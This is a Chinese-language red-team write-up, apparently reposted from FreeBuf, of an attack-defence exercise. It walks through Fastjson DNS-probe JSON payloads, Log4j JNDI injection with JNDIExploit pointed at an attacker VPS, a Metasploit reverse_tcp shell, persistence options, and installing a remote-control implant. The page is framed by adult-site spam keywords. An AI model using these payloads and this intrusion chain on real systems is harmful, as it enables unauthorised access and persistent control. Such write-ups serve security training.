成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

記一次攻防演練打點過程

開發 前端
前期先從備案查詢、子域名收集、端口掃描等方式獲取資產URL。其次對URL進行指紋識別,雖然發現了幾個存在指紋的系統,但后續滲透發現漏洞已無法利用,漏洞已修。最后老實本分對其他Web系統進行滲透,尋找突破口。

前言

在如今錯綜復雜的網絡環境,還有各種防護設備的加持,漏洞利用可謂難上加難。這里簡單記錄下在一次攻防演練中從打點到權限維持的曲折過程。

過程

前期先從備案查詢、子域名收集、端口掃描等方式獲取資產URL。其次對URL進行指紋識別,雖然發現了幾個存在指紋的系統,但后續滲透發現漏洞已無法利用,漏洞已修。最后老實本分對其他Web系統進行滲透,尋找突破口。

01 前后端分離架構

前后端分離的開發架構已然成為互聯網項目開發的主流模式,通過nginx+tomcat(中間加Node.js)來進行解耦,是未來的大型分布式架構、彈性計算架構、微服務架構和多端化服務的基礎。

·前端:負責View和Controller層·后端:負責Model層,進行業務/數據處理

JAVA 更適合做 Model 層、持久層的業務,引入Node.js可進行Controller層的處理。Node.js作為橋梁架接服務端API輸出的JSON數據。

02 WebPack資源管理

WebPack本身作為一個資源管理和打包構建工作,其強大之處在于各種靜態資源的依賴分析和預編譯。經過WebPack編譯后得到各種靜態資源,通常生成dist文件夾,保存各種靜態文件。其結構大致如下:

而app.js文件通常包含了各類前端路由或者后端API接口,是我們滲透前后端系統的突破口。當然不僅僅只是app.js中會存在。

03 發現指紋Fastjson

使用burp插件,可自動從js中爬取前端路由或者后端API接口

當獲取到后端API接口時,使用burp的Intruder模塊對所有接口發送GET和POST請求,POST請求時可以構造json請求體發送。

部分接口進行GET請求時,后端返回缺失某參數,此時可構造該參數并進行SQL注入等漏洞利用。

此時從報錯信息中發現某個接口使用Fastjson組件

于是利用DNS探測判斷Fastjson版本

Fastjson < 1.2.43

{"@type":"java.net.URL","val":"http://dnslog"} {{"@type":"java.net.URL","val":"http://dnslog"}:"x"}

Fastjson < 1.2.48

{"@type":"java.net.InetAddress","val":"dnslog"}

Fastjson < 1.2.68

{"@type":"java.net.Inet6Address","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
{{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}
{{"@type":"java.net.URL","val":"http://dnslog"}:0}

未發現DNSLog回顯

04 發現log4j漏洞

字段Content-Type存在dnslog回顯,先試試dns協議進行dnslog探測

可探測java版本,1.8.0_171版本

使用ldap協議進行dnslog探測

可探測服務器類型,Linux系統

可進行jndi注入利用,使用工具JNDIExploit-1.4-SNAPSHOT.jar

查看使用方式
命令:java -jar JNDIExploit-1.4-SNAPSHOT.jar -u

使用TomcatEcho鏈執行命令并回顯
命令:java -jar JNDIExploit-1.4-SNAPSHOT.jar -i your-vps-ip

發送cmd命令請求

成功執行命令并回顯,root權限

此時獲取命令執行權限,如何進行權限維持?獲取一個穩定的shell

05 權限維持

1)執行命令,直接反彈shell

2)執行命令,寫入webshell

3)jndi注入工具支持打入內存馬

4)jndi注入工具1.4版本新增支持上線msf

第一種嘗試:執行bash、sh命令反彈shell,存在ldap請求,但反彈命令未執行成功;

第二種嘗試:通過pwd、ls命令進行Web系統目錄,發現服務由jar起的,寫入webshell文件無法利用;

第三種嘗試:VPS收到打入內存馬的ldap請求,但訪問內存馬路徑時顯示404;

第四種嘗試:使用tomcatBypass路由上線msf成功

msf開啟監聽,使用payload:java/meterpreter/reverse_tcp

設置LHOST、LPORT,執行run開啟監聽

發送ldap請求,請求tomcatBypass路由,IP是VPS的IP,PORT是msf監聽的端口

上線msf,得到穩定式shell

得到shell,但無法進行直觀目錄瀏覽,而且shell是交互式shell,有沒有更好的遠控方式呢?

06 上線遠控

在本公眾號前面發過的文章中提到一款遠控平臺,自帶某廠商證書,為免殺工作省去大量功夫。但上線命令需要使用curl命令,然而該機器上并沒有curl命令。

沒有curl,但有wget,可不可以使用wget替換curl,詢問下chatgpt

答案是存在可替換的,但卻達不到我們的效果

于是安裝curl命令,但yum、apt-get等命令也沒有

很奇怪的一個系統,大概率是個閹割版的docker容器,先看下系統版本類型

cat /etc/os-release

這種系統內核,百度下

是個docker無疑了,詢問chatgpt該內核的系統如何下載curl

Apline Linux內核使用輕量級的apk包管理工具來管理軟件包。執行一鍵安裝命令,等待安裝過程

安裝完成,接下來使用curl命令一鍵上線遠控。

總結

命令執行無法反彈shell或許是防護設備攔截所致。

本文作者:極致攻防實驗室, 轉載請注明來自FreeBuf.COM

責任編輯:武曉燕 來源: FreeBuf.COM
相關推薦

2023-03-06 14:06:48

2017-12-19 14:00:16

數據庫MySQL死鎖排查

2019-08-26 09:50:09

2010-01-25 22:11:13

2021-02-01 09:00:34

Ceph octopu集群運維

2019-04-18 10:55:00

故障演練流量

2021-11-23 21:21:07

線上排查服務

2021-08-19 09:50:53

Java內存泄漏

2021-11-11 16:14:04

Kubernetes

2017-09-22 10:16:16

MySQL數據庫用戶數據

2011-08-08 13:31:44

數據分析數據倉庫

2020-09-23 09:27:13

代碼試用期機器

2022-06-01 06:17:42

微服務Kafka

2017-07-07 16:07:41

2014-08-11 09:31:52

2023-04-06 07:53:56

Redis連接問題K8s

2022-01-07 11:48:59

RabbitMQGolang 項目

2023-03-31 09:22:40

Hi3861芯片Flash

2014-04-15 14:28:14

2013-01-17 10:31:13

JavaScriptWeb開發firebug
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 精品久久网| 亚洲一区国产精品 | 午夜免费视频观看 | 欧美日韩一区二区在线 | 亚洲一区二区三区在线 | 午夜视频网站 | 国产精品a级 | 精品久久国产视频 | 91精品久久久久久久久中文字幕 | 日韩精品在线观看一区二区三区 | 毛片在线视频 | 日韩欧美不卡 | 日韩在线视频播放 | 一级免费毛片 | 国产一区二区三区在线视频 | 国产精品久久久久久久7电影 | 日韩精品一区二区在线 | 91麻豆精品国产91久久久久久 | 久久久久久久久久久久一区二区 | 午夜理伦三级理论三级在线观看 | 日韩高清中文字幕 | 日韩欧美一级精品久久 | 欧美激情一区 | 日韩在线| 欧美 日韩 亚洲91麻豆精品 | 久久亚洲一区 | 天天干天天插天天 | 日韩 欧美 综合 | www.久久 | 久久ww| 91视频中文 | www.亚洲国产精品 | 中文字幕av一区 | 91久久久www播放日本观看 | 国产亚洲精品久久午夜玫瑰园 | 亚洲一区二区免费电影 | 日韩一区二区在线视频 | 在线第一页 | 久久久久久国产精品免费免费男同 | 成人免费视频网站在线观看 | 国产成人精品久久二区二区91 |